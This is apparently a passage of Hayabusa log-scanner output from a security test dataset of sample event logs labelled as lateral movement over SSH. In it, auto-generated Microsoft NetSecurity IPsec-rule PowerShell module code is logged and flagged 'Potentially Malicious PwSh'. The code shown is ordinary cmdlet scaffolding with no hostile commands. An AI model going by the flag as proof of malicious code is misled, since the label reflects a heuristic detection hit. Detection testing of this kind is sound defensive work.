$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, 